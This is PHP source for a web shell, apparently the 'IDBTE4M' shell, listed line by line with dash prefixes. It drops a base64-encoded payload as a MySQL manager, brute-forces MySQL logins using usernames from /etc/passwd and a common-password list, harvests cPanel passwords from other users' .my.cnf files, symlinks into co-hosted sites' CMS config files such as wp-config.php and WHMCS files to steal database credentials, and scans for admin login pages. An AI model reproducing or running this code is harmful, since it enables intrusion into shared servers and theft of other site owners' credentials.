ZklXUFVXT3J6UzR1a0c0MGdoY1p3QUdweU9EbWVNZnNndnhDZnovMUpGRkRTcHJQVldMMGVTWkJXcmx2Y3psYVlwOFdSb0dhY2d4eW5yN2hGSGlUU2JHUHo0RFA1OXNXcmwveWtmOWpLNWdWOG5oK3JOUVRXN1hhdGYraytkRXM1NnJBalA5YWEwT3RnODNITjJhQzI5OFdYWC9pYk1CMnJTaUFPbVhGOG1PRmdvL3VZYTIzakVMRUUwcnQ2TGViWkZKYXZIL1JUdXRUVmRLZUk2MG5NWmtPZnBYUTMyUUxIdWc3VDI2QWt4TFE5YXNxZmRGSnJFL3pzbjVGdnkvU1ZPRVN3dXp5YzYySnQ0OW9LM3BwN1B0R1doeVM5aFdXcVk1VjFacUQzS3V2RERPWWhWVTgvK2hCRnY3WkhObGtSNTNhNVBOS0dGV1BrNUlQUld5akZZVFZkVlMrenhQSTRJckduQ2tvK2s0Wk43NEN2UEttcFBjQjhETUNrUXBxQ0pzK3hMNFQ3NElYYlZod0RNNlNjTWVRRkJ1OGNTamdMZDJiN0FmREpmVmRKQXRzSkRZcFNTUHNDZ3p5MHRjQ3RuM1NPa1h2VVhhVmZvSUJiY3U2Y1pCK2Q5WWtUSFUvUHlzQlk5cktmUFhWbVFrZVZWQ1RqRUNnQzZYZEZ2Nk5reGlSYlRMUDVKaTNYUjE3R3ZDQkY4ZWw4Nm9hdGJMdG9aWXZsdll6THA2c3RmNmd5TzZjVTExelROVEJXWVlrem1qeTVBRGxjS3JsUU5IdmZva1RUZ3VjdVFWYlVmOUVhRWN4cDNkZDlzZjlrK0ZLK0VsK01CMXJDdG5YQ1N2anFNMzBQa0QzK1FwdzZmK2drMUpkWGtGbk9xWFY1YVFCRGd3Y3djOUpaSzdNdnpLSHJIZmQvOVlQVjRjcWxVeVdvaEVjdVNTVG9Fd2g2NjlEL2tQcWlqTitWSzlvKzhjSGUrOTN6Nyt3eUdqaHFBUG9uQUlDdFhIcGM4UldVMGJvZlBoWU84ZkgzYi80cVRtaDIxU0IvaFd6eGtEcVBISjVHV01rTnQ4S1FzbmFzbmJhTGFjaDZicGttdlVTOXJPK0J4MFJwYlVwWG9taWlvbE5icWRLWjlYQmZTMU8yWXIxc0hhU1ZkSkw0V2w3dFFkOHl5N1pGdlhZbHZwaUFzaGkzRVlSVldqcjJXWGh1Mlo1dFkzNjgvcDZxVGtzbU56UGd2NW9yWnFMU0ZKMmRBOFpmV1VaclpPSC9iTGZzaWNzQitFbmw3RlFVcUhxblZUSTNzUmxuMmF1bEQvbVRoNUUyWEZMWHRIZWI2MW5DcTVzZ2NZN3ZlU0FRS1dDTmppUzhEeTdkK3F3NW9RVVNMWGpSOTMxMXNsY2xUU1hsdkx3RzZabHQ5SEtqYTZlSmp6SlpFbzBjZ24wdkJtZUlabXVaalRFc2xnemdLNGpyclZtNHk5aGErUDNFcnd5d3R4dDJXVHF0YjVmcE5ETG1FMXZDdFE0bkZiQ1RKSFA4eWUxVm1XVUFzZk56YWU2aVh1M1J3bGdBVUZMV2VoSzBpM2ZCbzNIT3ZaZHcyWWp1alZRQk9IZi8rL0hQRjB4WFdsMnd4NmpteituTGwxN2hZYnJPT3EyWHptT05pdTY5Ymt0WEdPSnFMWDdpdnkrZno4VS9neXVydVNmMitmUGlpVzJ5bW55eSt6VnJ6NDNFanVHaC9YbnAveEs2OGtzKzFrRHhUZlY4S1JRZWhVaE4rRHZ1UGdoWGFaRHd5RWpJNUM1Y3U5Vk9GUzZWZTVkRnY5QVF2S3BXZGdCN1IvMldrdytURkF4TlhZK1NrN2cxMmxYMlhUZER5REx6d29NbHpLYjh1YTJpcjlLcGR1NHhNTHdDOGRhMFdsNnIyNmdYWFBuMHFJNkNBWG5FOGxsQmhZNDRhWnRFT3FQMnVReWRIRGlabVVHSmc1d0tSUW40SThNeGo4U1Z3ZFVDaS9mRHZBZnFIQitiZHJwbE1hNDJNOVhWaWNxV1lnOU1PRDh2RVNsY2Jwb3I3cFZsWU91dUU2S3BMMElaTkp6YUhTbVpCNWo5RG1zOWhTZjFJd2QwdWt5TTh5cnV0TzlaeWl2NS83eFM4MERvcFJIVmFoZGVrNjk0ZDdlYUdyWngwSFhWSXo5Y3ptK21ha29ReXZvMGh3aVd4cmc4RktKbHc1Z3ZKNjZqKzZSOElrVEtkTEdhN2VUYk9sc0g0Y05qZHorSS9zRUJhT0w3WEZqTTZCbWJQUWYyMkhpdVM5VWd0WTUrRFJuaitiR3FGRWZ5ekNua2dxQTZTbi9Fc1NhbUZRU2twUVd3Q3lmbXlJeVRTMEN6dldjdVU5RzRxVHZkOHFsZkd6TXBkVG1DK2piR1UrcC9SYWxlM0w4MSt1QkR0Z1N5MHZMWEZMSG9VcVc5OG96MHRXdDJRRDN1S3kyU0RUZU9taWFaZ1YwMjAvQXlYVFhiSDU3SnQzaXFKY3p6MEcxS2ZYZ082OWtMRUhXczdDTitaaGUxVWVmbXYyczN6c1dZSTE4eXpRb214M1YzZXhNSlpOdjhqUExOVi9Qa0RseTFmV3pTdVJoVWQ1MkVDRXdlV1FkZGxMbmU2dmVPWHdoSlBtU2NQY0M0VGxUVFk2MHlySUJYVEtzMjkxTFdLZndpNFdvQVduUXlxMTdscXBVa0x5dnk1QjhBdz0iKSkpOyA/Pg==";
- $write = fwrite($f2, base64_decode($sml_db));
- if ($write) {
- @chmod('s/db.php', 0755);
- }
- echo "</br></br><center><b>GO TO : <a href='s/db.php' target='_blank'>[+] MYSQL MANAGER [+]</a></center></br>";
- }
- }
- ?>
- <?php
- if (isset($_GET['jak']) && ($_GET['jak'] == 'brute')) { ?>
- <form action="?jak=brute" method="post">
- <?php ?>
- <html>
- <head>
- <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
- <body text="#4C83AF" bgcolor="#111111" font="Verdana, Arial, Helvetica, sans-serif">
- <center>
- <form method="POST">
- <strong>
- <input name="page" type="hidden" value="find">
- </strong>
- <div style="width:90%">
- <div id="result">
- <br /><br />
- </div>
- <div id="mp" style="width:49%;float:left">
- <b>~ UserName ~</b>
- </div>
- <div id="mp" style="width:49%;float:left">
- <b>~ PassWord ~</b>
- </div>
- <div id="mp" style="clear:both;width:49%;float:left">
- <textarea rows="10" class="coode" style="width:100%" name="usernames"><? if($_POST['page']=='find' && $_POST['usernames']<=''){$lines=@file("/etc/passwd");foreach($lines as $nr=>$val){$str=explode(":",$val);echo $str[0]."
- ";}}else{echo $_POST['usernames'];} ?></textarea>
- </div>
- <div id="s" style="width:2%;float:left">
-
- </div>
- <div id="s" style="width:49%;float:left">
- <textarea rows="10" class="coode" style="width:100%" name="passwords"><? if($_POST['page']=='find' && $_POST['passwords']<=''){echo "123
- 1234
- 12345
- 123456
- 1234567
- 12345678
- 123456789
- 1234567890
- Password
- pass
- admin
- admin123
- admin1234
- admin12345
- admin123456
- admin1234567
- admin12345678
- admin123456789
- admin1234567890
- administrator123
- administrator1234
- administrator12345
- administrator123456
- administrator1234567
- administrator12345678
- administrator123456789
- administrator1234567890
- password123
- password1234
- password12345
- password123456
- password1234567
- password12345678
- password123456789
- password1234567890
- 123456
- 123123
- 1234
- 12345
- 12369874
- 123456789
- 112233
- 12345678
- 123654
- 123654789
- 1234admin
- password
- passwd1
- password123
- test123
- 159357
- 147258
- 159951
- 123321
- ADMIN
- 195159
- 147852
- Admin
- Administrator
- Demo
- User
- user
- useruser
- 987456321
- 741852
- 321987
- 357159
- 1234566
- 1234567899
- 111222
- Administrateur
- administrateur
- 0123456
- 0123456789
- 0147258
- 147258
- 987654
- 963852
- 369258
- 456789
- 456321
- 456123
- ADMIN1234
- Admin1234
- admin123456
- admin1234
- admin01234
- 000000
- 142536
- 632541
- "; }else{echo $_POST['passwords'];} ?></textarea>
- </div>
- </div>
- <div style="width:90%;clear:both">
- <br><p><input type="submit" name="submit" class="inputzbut" value="Go !" style="width:120px;height:30px;" /></p>
- </div>
- <br /><br /><br />
- </form>
- <?
- if($_POST['page']=='find')
- {
- echo"<div id='result'>";
- if(isset($_POST['usernames']) && isset($_POST['passwords']))
- {
- $a1 = explode("
- ",$_POST['usernames']);
- $a2 = explode("
- ",$_POST['passwords']);
- $id2 = count($a2);
- $ok = 0;
- foreach($a1 as $user )
- {
- if($user !== '')
- {
- $user=trim($user);
- for($i=0;$i<=$id2;$i++)
- {
- $pass = trim($a2[$i]);
- if(@mysql_connect('localhost',$user,$pass))
- {
- if($pass !== ''){
- echo "<b>[ IDBTE4M ]=> </b> <b>User[<font color='green'> $user </font>] Pass[<font color='green'> $pass </font>]</b><br>";
- $ok++;
- }}
- }
- }
- }
- echo "<hr><b>You Found <font color=green>$ok</font>BY IDBTE4M</b>";
- exit;
- }
- echo'</div>';
- }
- }
- ?>
- <?php
- if (isset($_GET['jak']) && ($_GET['jak'] == 'cp')) {
- ?>
- <form action="?&jak=cp" method="post">
- <?php
- /**
- * @author: FaisaL Ahmed aka blue X
- * @mail: me@faialahmed.me
- * @Screenshot: http://prntscr.com/7c1p34
- * @Last Updated: 01 June 2015
- */
- @ini_set('display_errors',0);
- function entre2v2($text,$marqueurDebutLien,$marqueurFinLien,$i=1){
- $ar0=explode($marqueurDebutLien, $text);
- $ar1=explode($marqueurFinLien, $ar0[$i]);
- return trim($ar1[0]);
- }
- echo "<center>";
- $d0mains = @file('/etc/named.conf');
- $domains = scandir("/var/named");
- if ($domains or $d0mains)
- {
- $domains = scandir("/var/named");
- if($domains) {
- echo "<table align='center'><tr><th> COUNT </th><th> DOMAIN </th><th> USER </th><th> Password </th><th> .my.cnf </th></tr>";
- $count=1;
- $dc = 0;
- $list = scandir("/var/named");
- foreach($list as $domain){
- if(strpos($domain,".db")){
- $domain = str_replace('.db','',$domain);
- $owner = posix_getpwuid(fileowner("/etc/valiases/".$domain));
- $dirz = '/home/'.$owner['name'].'/.my.cnf';
- $path = getcwd();
- if (is_readable($dirz)) {
- copy($dirz, ''.$path.'/'.$owner['name'].'.txt');
- $p=file_get_contents(''.$path.'/'.$owner['name'].'.txt');
- $password=entre2v2($p,'password="','"');
- echo "<tr><td>".$count++."</td><td><a href='http://".$domain.":2082' target='_blank'>".$domain."</a></td><td>".$owner['name']."</td><td>".$password."</td><td><a href='".$owner['name'].".txt' target='_blank'>Click Here</a></td></tr>";
- $dc++;
- }
- }
- }
- echo '</table>';
- $total = $dc;
- echo '<br><div class="result">Total cPanel Found = '.$total.'</h3><br />';
- echo '</center>';
- }else{
- $d0mains = @file('/etc/named.conf');
- if($d0mains) {
- echo "<table align='center'><tr><th> COUNT </th><th> DOMAIN </th><th> USER </th><th> Password </th><th> .my.cnf </th></tr>";
- $count=1;
- $dc = 0;
- $mck = array();
- foreach($d0mains as $d0main){
- if(@eregi('zone',$d0main)){
- preg_match_all('#zone "(.*)"#',$d0main,$domain);
- flush();
- if(strlen(trim($domain[1][0])) >2){
- $mck[] = $domain[1][0];
- }
- }
- }
- $mck = array_unique($mck);
- $usr = array();
- $dmn = array();
- foreach($mck as $o) {
- $infos = @posix_getpwuid(fileowner("/etc/valiases/".$o));
- $usr[] = $infos['name'];
- $dmn[] = $o;
- }
- array_multisort($usr,$dmn);
- $dt = file('/etc/passwd');
- $passwd = array();
- foreach($dt as $d) {
- $r = explode(':',$d);
- if(strpos($r[5],'home')) {
- $passwd[$r[0]] = $r[5];
- }
- }
- $l=0;
- $j=1;
- foreach($usr as $r) {
- $dirz = '/home/'.$r.'/.my.cnf';
- $path = getcwd();
- if (is_readable($dirz)) {
- copy($dirz, ''.$path.'/'.$r.'.txt');
- $p=file_get_contents(''.$path.'/'.$r.'.txt');
- $password=entre2v2($p,'password="','"');
- echo "<tr><td>".$count++."</td><td><a target='_blank' href=http://".$dmn[$j-1].'/>'.$dmn[$j-1].' </a></td><td>'.$r."</td><td>".$password."</td><td><a href='".$r.".txt' target='_blank'>Click Here</a></td></tr>";
- $dc++;
- flush();
- $l=$l?0:1;
- $j++;
- }
- }
- }
- echo '</table>';
- $total = $dc;
- echo '<br><div class="result">Total cPanel Found = '.$total.'</h3><br />';
- echo '</center>';
- }
- }else{
- echo "<div class='result'><i><font color='#FF0000'>ERROR</font><br><font color='#FF0000'>/var/named</font> or <font color='#FF0000'>etc/named.conf</font> Not Accessible!</i></div>";
- }
- echo "</body></html>";
- }
- ?>
- <?php
- if (isset($_GET['jak']) && ($_GET['jak'] == 'sym')) {
- ?>
- <form action="?path=<?php echo $path; ?>&jak=sym" method="post">
- <center><h2>Domain Viewer</h2></center><br><br>
- <?php
- function openBaseDir()
- {
- $openBaseDir = ini_get("open_basedir");
- if (!$openBaseDir)
- {
- $openBaseDir = '<font color="green">OFF</font>';
- }
- else
- {
- $openBaseDir = '<font color="red">ON</font>';
- }
- return $openBaseDir;
- }
- echo '
- <table width="95%" cellspacing="0" cellpadding="0" class="td1" >
- <td height="100" align="left" class="td1">';
- $pg = basename(__FILE__);
- $safe_mode = @ini_get('safe_mode');
- $dir = @getcwd();
- ////////////////////////////////////////////////////
- // LET'S PLAY ~
- ##.htaccess
- @mkdir('jaks',0777);
- @symlink("/","jaks/!");
- $htaccss = "Options Indexes FollowSymLinks\nDirectoryIndex amis.txt\nAddType txt .php\nAddHandler txt .php";
- file_put_contents("jaks/.htaccess",$htaccss);
- $etc = file_get_contents("/etc/passwd");
- $etcz = explode("\n",$etc);
- ##Symlink to the ROOT :p
- foreach($etcz as $etz){
- $etcc = explode(":",$etz);
- error_reporting(0);
- $current_dir = posix_getcwd();
- $dir = explode("/",$current_dir);
- symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/wp-config.php',"pee/".$etcc[0].'-WordPress.txt');
- symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/blog/wp-config.php',"pee/".$etcc[0].'-WordPress.txt');
- symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/wp/wp-config.php',"pee/".$etcc[0].'-WordPress.txt');
- symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/site/wp-config.php',"pee/".$etcc[0].'-WordPress.txt');
- symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/config.php',"pee/".$etcc[0].'-PhpBB.txt');
- symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/includes/config.php',"pee/".$etcc[0].'-vBulletin.txt');
- symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/configuration.php',"pee/".$etcc[0].'-Joomla.txt');
- symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/web/configuration.php',"pee/".$etcc[0].'-Joomla.txt');
- symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/joomla/configuration.php',"pee/".$etcc[0].'-Joomla.txt');
- symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/site/configuration.php',"pee/".$etcc[0].'-Joomla.txt');
- symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/conf_global.php',"pee/".$etcc[0].'-IPB.txt');
- symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/inc/config.php',"pee/".$etcc[0].'-MyBB.txt');
- symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/Settings.php',"pee/".$etcc[0].'-SMF.txt');
- symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/sites/default/settings.php',"pee/".$etcc[0].'-Drupal.txt');
- symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/e107_config.php',"pee/".$etcc[0].'-e107.txt');
- symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/datas/config.php',"pee/".$etcc[0].'-Seditio.txt');
- symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/includes/configure.php',"pee/".$etcc[0].'-osCommerce.txt');
- symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/client/configuration.php',"pee/".$etcc[0].'-WHMCS.txt');
- symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/clientes/configuration.php',"pee/".$etcc[0].'-WHMCS.txt');
- symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/support/configuration.php',"pee/".$etcc[0].'-WHMCS.txt');
- symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/supportes/configuration.php',"pee/".$etcc[0].'-WHMCS.txt');
- symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/whmcs/configuration.php',"pee/".$etcc[0].'-WHMCS.txt');
- symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/domain/configuration.php',"pee/".$etcc[0].'-WHMCS.txt');
- symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/hosting/configuration.php',"pee/".$etcc[0].'-WHMCS.txt');
- symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/whmc/configuration.php',"pee/".$etcc[0].'-WHMCS.txt');
- symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/billing/configuration.php',"pee/".$etcc[0].'-WHMCS.txt');
- symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/portal/configuration.php',"pee/".$etcc[0].'-WHMCS.txt');
- symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/order/configuration.php',"pee/".$etcc[0].'-WHMCS.txt');
- symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/clientarea/configuration.php',"pee/".$etcc[0].'-WHMCS.txt');
- symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/domains/configuration.php',"pee/".$etcc[0].'-WHMCS.txt');
- }
- #############################
- if(is_readable("/var/named")){
- echo'<table align="center" border="1" width="45%" cellspacing="0" cellpadding="4" class="td1">';
- echo'<tr><td><center><b>SITE</b></center></td><td>
- <center><b>USER</b></center></td>
- <td></center><b>SYMLINK</b></center></td>';
- $list = scandir("/var/named");
- foreach($list as $domain){
- if(strpos($domain,".db")){
- $i += 1;
- $domain = str_replace('.db','',$domain);
- $owner = posix_getpwuid(fileowner("/etc/valiases/".$domain));
- echo "<tr><td class='td1'><a href='http://".$domain." '>".$domain."</a></td>
- <td class='td1'><center><font color='red'>".$owner['name']."</font></center></td>
- <td class='td1'><center><a href='jaks/!".$owner['dir']."/".$dir[3]."' target='_blank'>DIR</a></center></td>";
- }
- }
- echo "<center>Total Domains Found: ".$i."</center><br />";
- }else{
- echo "<tr><td class='td1'>can't read [ /var/named ]</td><tr>"; }
- break;
- ##################################
- error_reporting(0);
- $etc = file_get_contents("/etc/passwd");
- $etcz = explode("\n",$etc);
- if(is_readable("/etc/passwd")){
- echo'<table align="center" border="1" width="45%" cellspacing="0" cellpadding="4" class="td1">';
- echo'<tr><td><center><b>SITE</b></center></td><td><center><b>USER</b></center></td><td><center><b>SYMLINK</b></center></td>';
- $list = scandir("/var/named");
- foreach($etcz as $etz){
- $etcc = explode(":",$etz);
- foreach($list as $domain){
- if(strpos($domain,".db")){
- $domain = str_replace('.db','',$domain);
- $owner = posix_getpwuid(fileowner("/etc/valiases/".$domain));
- if($owner['name'] == $etcc[0])
- {
- $i += 1;
- echo "<tr><td class='td1'><a href='http://".$domain." '>".$domain."</a></td><center>
- <td class='td1'><font color='red'>".$owner['name']."</font></center></td>
- <td class='td1'><center><a href='jaks/!".$owner['dir']."/".$dir[3]."' target='_blank'>DIR</a></center></td>";
- }}}}
- echo "<center>Total Domains Found: ".$i."</center><br />";}
- break;
- ###############################
- if(is_readable("/etc/named.conf")){
- echo'<table align="center" border="1" width="45%" cellspacing="0" cellpadding="4" class="td1">';
- echo'<tr><td><center><b>SITE</b></center></td><td><center><b>USER</b></center></td><td></center><b>SYMLINK</b></center></td>';
- $named = file_get_contents("/etc/named.conf");
- preg_match_all('%zone \"(.*)\" {%',$named,$domains);
- foreach($domains[1] as $domain){
- $domain = trim($domain);
- $i += 1;
- $owner = posix_getpwuid(fileowner("/etc/valiases/".$domain));
- echo "<tr><td class='td1'><a href='http://".$domain." '>".$domain."</a></td><td class='td1'><center><font color='red'>".$owner['name']."</font></center></td><td class='td1'><center><a href='jaks/!".$owner['dir']."/".$dir[3]."'
- target='_blank'>DIR</a></center></td>";
- }
- echo "<center>Total Domains Found: ".$i."</center><br />";
- } else { echo "<tr><td class='td1'>can't read [ /etc/named.conf ]</td></tr>"; }
- break;
- ############################
- if(is_readable("/etc/valiases")){
- echo'<table align="center" border="1" width="45%" cellspacing="0" cellpadding="4" class="td1">';
- echo'<tr><td><center><b>SITE</b></center></td><td>
- <center><b>USER</b></center></td><td></center>
- <b>SYMLINK</b></center></td>';
- $list = scandir("/etc/valiases");
- foreach($list as $domain){
- $i += 1;
- $owner = posix_getpwuid(fileowner("/etc/valiases/".$domain));
- echo "<tr><td class='td1'><a href='http://".$domain." '>".$domain."</a></td>
- <center><td class='td1'><font color='red'>".$owner['name']."</font></center></td>
- <td class='td1'><center><a href='jaks/!".$owner['dir']."/".$dir[3]."' target='_blank'>DIR</a></center></td>";
- }
- echo "<center>Total Domains Found: ".$i."</center><br />";
- } else { echo "<tr><td class='td1'>can't read [ /etc/valiases ]</td></tr>"; }
- break;
- }
- ?>
- <?php
- if (isset($_GET['jak']) && ($_GET['jak'] == 'finder')) {
- ?>
- <form action="?&jak=finder" method="post">
- <?php
- set_time_limit(0);
- error_reporting(0);
- $list['front'] =
- "
- admin
- adm
- admincp
- admcp
- cp
- modcp
- moderatorcp
- adminare
- admins
- cpanel
- controlpanel";
- $list['end'] = "
- admin1.php
- admin1.html
- admin2.php
- admin2.html
- yonetim.php
- yonetim.html
- yonetici.php
- yonetici.html
- ccms/
- ccms/login.php
- ccms/index.php
- maintenance/
- webmaster/
- adm/
- configuration/
- configure/
- websvn/
- admin/
- admin/account.php
- admin/account.html
- admin/index.php
- admin/index.html
- admin/login.php
- admin/login.html
- admin/home.php
- admin/controlpanel.html
- admin/controlpanel.php
- admin.php
- admin.html
- admin/cp.php
- admin/cp.html
- cp.php
- cp.html
- administrator/
- administrator/index.html
- administrator/index.php
- administrator/login.html
- administrator/login.php
- administrator/account.html
- administrator/account.php
- administrator.php
- administrator.html
- login.php
- login.html
- modelsearch/login.php
- moderator.php
- moderator.html
- moderator/login.php
- moderator/login.html
- moderator/admin.php
- moderator/admin.html
- moderator/
- account.php
- account.html
- controlpanel/
- controlpanel.php
- controlpanel.html
- admincontrol.php
- admincontrol.html
- adminpanel.php
- adminpanel.html
- admin1.asp
- admin2.asp
- yonetim.asp
- yonetici.asp
- admin/account.asp
- admin/index.asp
- admin/login.asp
- admin/home.asp
- admin/controlpanel.asp
- admin.asp
- admin/cp.asp
- cp.asp
- administrator/index.asp
- administrator/login.asp
- administrator/account.asp
- administrator.asp
- login.asp
- modelsearch/login.asp
- moderator.asp
- moderator/login.asp
- moderator/admin.asp
- account.asp
- controlpanel.asp
- admincontrol.asp
- adminpanel.asp
- fileadmin/
- fileadmin.php
- fileadmin.asp
- fileadmin.html
- administration/
- administration.php
- administration.html
- sysadmin.php
- sysadmin.html
- phpmyadmin/
- myadmin/
- sysadmin.asp
- sysadmin/
- ur-admin.asp
- ur-admin.php
- ur-admin.html
- ur-admin/
- Server.php
- Server.html
- Server.asp
- Server/
- wp-admin/
- administr8.php
- administr8.html
- administr8/
- administr8.asp
- webadmin/
- webadmin.php
- webadmin.asp
- webadmin.html
- administratie/
- admins/
- admins.php
- admins.asp
- admins.html
- administrivia/
- Database_Administration/
- WebAdmin/
- useradmin/
- sysadmins/
- admin1/
- system-administration/
- administrators/
- pgadmin/
- directadmin/
- staradmin/
- ServerAdministrator/
- SysAdmin/
- administer/
- LiveUser_Admin/
- sys-admin/
- typo3/
- panel/
- cpanel/
- cPanel/
- cpanel_file/
- platz_login/
- rcLogin/
- blogindex/
- formslogin/
- autologin/
- support_login/
- meta_login/
- manuallogin/
- simpleLogin/
- loginflat/
- utility_login/
- showlogin/
- memlogin/
- members/
- login-redirect/
- sub-login/
- wp-login/
- login1/
- dir-login/
- login_db/
- xlogin/
- smblogin/
- customer_login/
- UserLogin/
- login-us/
- acct_login/
- admin_area/
- bigadmin/
- project-admins/
- phppgadmin/
- pureadmin/
- sql-admin/
- radmind/
- openvpnadmin/
- wizmysqladmin/
- vadmind/
- ezsqliteadmin/
- hpwebjetadmin/
- newsadmin/
- adminpro/
- Lotus_Domino_Admin/
- bbadmin/
- vmailadmin/
- Indy_admin/
- ccp14admin/
- irc-macadmin/
- banneradmin/
- sshadmin/
- phpldapadmin/
- macadmin/
- administratoraccounts/
- admin4_account/
- admin4_colon/
- radmind-1/
- Super-Admin/
- AdminTools/
- cmsadmin/
- SysAdmin2/
- globes_admin/
- cadmins/
- phpSQLiteAdmin/
- navSiteAdmin/
- server_admin_small/
- logo_sysadmin/
- server/
- database_administration/
- power_user/
- system_administration/
- ss_vms_admin_sm/
- adminarea/
- bb-admin/
- adminLogin/
- panel-administracion/
- instadmin/
- memberadmin/
- administratorlogin/
- admin/admin.php
- admin_area/admin.php
- admin_area/login.php
- siteadmin/login.php
- siteadmin/index.php
- siteadmin/login.html
- admin/admin.html
- admin_area/index.php
- bb-admin/index.php
- bb-admin/login.php
- bb-admin/admin.php
- admin_area/login.html
- admin_area/index.html
- admincp/index.asp
- admincp/login.asp
- admincp/index.html
- webadmin/index.html
- webadmin/admin.html
- webadmin/login.html
- admin/admin_login.html
- admin_login.html
- panel-administracion/login.html
- nsw/admin/login.php
- webadmin/login.php
- admin/admin_login.php
- admin_login.php
- admin_area/admin.html
- pages/admin/admin-login.php
- admin/admin-login.php
- admin-login.php
- bb-admin/index.html
- bb-admin/login.html
- bb-admin/admin.html
- admin/home.html
- pages/admin/admin-login.html
- admin/admin-login.html
- admin-login.html
- admin/adminLogin.html
- adminLogin.html
- home.html
- rcjakar/admin/login.php
- adminarea/index.html
- adminarea/admin.html
- webadmin/index.php
- webadmin/admin.php
- user.html
- modelsearch/login.html
- adminarea/login.html
- panel-administracion/index.html
- panel-administracion/admin.html
- modelsearch/index.html
- modelsearch/admin.html
- admincontrol/login.html
- adm/index.html
- adm.html
- user.php
- panel-administracion/login.php
- wp-login.php
- adminLogin.php
- admin/adminLogin.php
- home.php
- adminarea/index.php
- adminarea/admin.php
- adminarea/login.php
- panel-administracion/index.php
- panel-administracion/admin.php
- modelsearch/index.php
- modelsearch/admin.php
- admincontrol/login.php
- adm/admloginuser.php
- admloginuser.php
- admin2/login.php
- admin2/index.php
- adm/index.php
- adm.php
- affiliate.php
- adm_auth.php
- memberadmin.php
- administratorlogin.php
- admin/admin.asp
- admin_area/admin.asp
- admin_area/login.asp
- admin_area/index.asp
- bb-admin/index.asp
- bb-admin/login.asp
- bb-admin/admin.asp
- pages/admin/admin-login.asp
- admin/admin-login.asp
- admin-login.asp
- user.asp
- webadmin/index.asp
- webadmin/admin.asp
- webadmin/login.asp
- admin/admin_login.asp
- admin_login.asp
- panel-administracion/login.asp
- adminLogin.asp
- admin/adminLogin.asp
- home.asp
- adminarea/index.asp
- adminarea/admin.asp
- adminarea/login.asp
- panel-administracion/index.asp
- panel-administracion/admin.asp
- modelsearch/index.asp
- modelsearch/admin.asp
- admincontrol/login.asp
- adm/admloginuser.asp
- admloginuser.asp
- admin2/login.asp
- admin2/index.asp
- adm/index.asp
- adm.asp
- affiliate.asp
- adm_auth.asp
- memberadmin.asp
- administratorlogin.asp
- siteadmin/login.asp
- siteadmin/index.asp
- ADMIN/
- paneldecontrol/
- login/
- cms/
- admon/
- ADMON/
- administrador/
- ADMIN/login.php
- panelc/
- ADMIN/login.html";
- function template() {
- echo '
- <script type="text/javascript">
- <!--
- function insertcode($text, $place, $replace)
- {
- var $this = $text;
- var logbox = document.getElementById($place);
- if($replace == 0)
- document.getElementById($place).innerHTML = logbox.innerHTML+$this;
- else
- document.getElementById($place).innerHTML = $this;
- //document.getElementById("helpbox").innerHTML = $this;
- }
- -->
- </script>
- <br>
- <br>
- <h1 class="technique-two">
- </h1>
- <div class="wrapper">
- <div class="red">
- <div class="tube">
- <center><table class="tabnet"><th colspan="2">Admin Finder</th><tr><td>
- <form action="" method="post" name="xploit_form">
- <tr>
- <tr>
- <b><td>URL</td>
- <td><input class="inputz" type="text" name="xploit_url" value="'.$_POST['xploit_url'].'" style="width: 350px;" />
- </td>
- </tr><tr>
- <td>404 string</td>
- <td><input class="inputz" type="text" name="xploit_404string" value="'.$_POST['xploit_404string'].'" style="width: 350px;" />
- </td></b>
- </tr><br><td>
- <span style="float: center;"><input class="inputzbut" type="submit" name="xploit_submit" value=" Start Scan" align="center" />
- </span></td></tr>
- </form></td></tr>
- <br /></table>
- </div> <!-- /tube -->
- </div> <!-- /red -->
- <br />
- <div class="green">
- <div class="tube" id="rightcol">
- Verificat: <span id="verified">0</span> / <span id="total">0</span><br />
- <b>Found ones:<br /></b>
- </div> <!-- /tube -->
- </div></center><!-- /green -->
- <br clear="all" /><br />
- <div class="blue">
- <div class="tube" id="logbox">
- <br />
- <br />
- Admin page Finder :<br /><br />
- </div> <!-- /tube -->
- </div> <!-- /blue -->
- </div> <!-- /wrapper -->
- <br clear="all"><br>';
- }
- function show($msg, $br=1, $stop=0, $place='logbox', $replace=0) {
- if($br == 1) $msg .= "<br />";
- echo "<script type=\"text/javascript\">insertcode('".$msg."', '".$place."', '".$replace."');</script>";
- if($stop == 1) exit;
- @flush();@ob_flush();
- }
- function check($x, $front=0) {
- global $_POST,$site,$false;
- if($front == 0) $t = $site.$x;
- else $t = 'http://'.$x.'.'.$site.'/';
- $headers = get_headers($t);
- if (!eregi('200', $headers[0])) return 0;
- $data = @file_get_contents($t);
- if($_POST['xploit_404string'] == "") if($data == $false) return 0;
- if($_POST['xploit_404string'] != "") if(strpos($data, $_POST['xploit_404string'])) return 0;
- return 1;
